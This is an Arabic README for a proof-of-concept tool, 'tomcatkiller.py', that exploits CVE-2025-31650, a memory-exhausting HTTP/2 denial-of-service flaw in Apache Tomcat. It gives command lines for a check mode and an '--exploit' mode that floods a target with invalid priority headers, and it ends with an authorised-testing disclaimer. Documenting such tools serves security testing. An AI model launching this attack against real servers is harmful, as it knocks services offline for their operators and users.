
إثبات المفهوم لـ CVE-2025-31650
🚨 إثبات المفهوم (PoC) لثغرة حجب الخدمة (DoS) عبر HTTP/2 في Apache Tomcat (CVE-2025-31650)
يُحدث هذا السكربت حالة استنزافٍ للذاكرة في Apache Tomcat من خلال إرسال ترويسات priority غير صالحة عبر HTTP/2.
Server (اكتشاف Tomcat)--check-only (غير تدخّلي)python3 tomcatkiller.py --target https://example.com:8443 --check-only
python3 tomcatkiller.py --target https://example.com:8443 --exploit --tasks 50 --requests 5000
| المعامل | الوصف |
|---|---|
--target | عنوان الهدف الكامل مع البروتوكول والمنفذ |
--check-only | اختبار فقط ما إذا كان الخادم يدعم HTTP/2 وTomcat |
--exploit | تشغيل هجوم DoS الفعلي |
--tasks | عدد المهام اللاتزامنية (الافتراضي: 50) |
--requests | الطلبات لكل مهمة (الافتراضي: 5000) |
هذا الدليل (PoC) مخصص للأغراض التعليمية وللاختبارات الأمنية المصرّح بها فقط.
لا تستخدمه ضد أي نظام دون إذن صريح.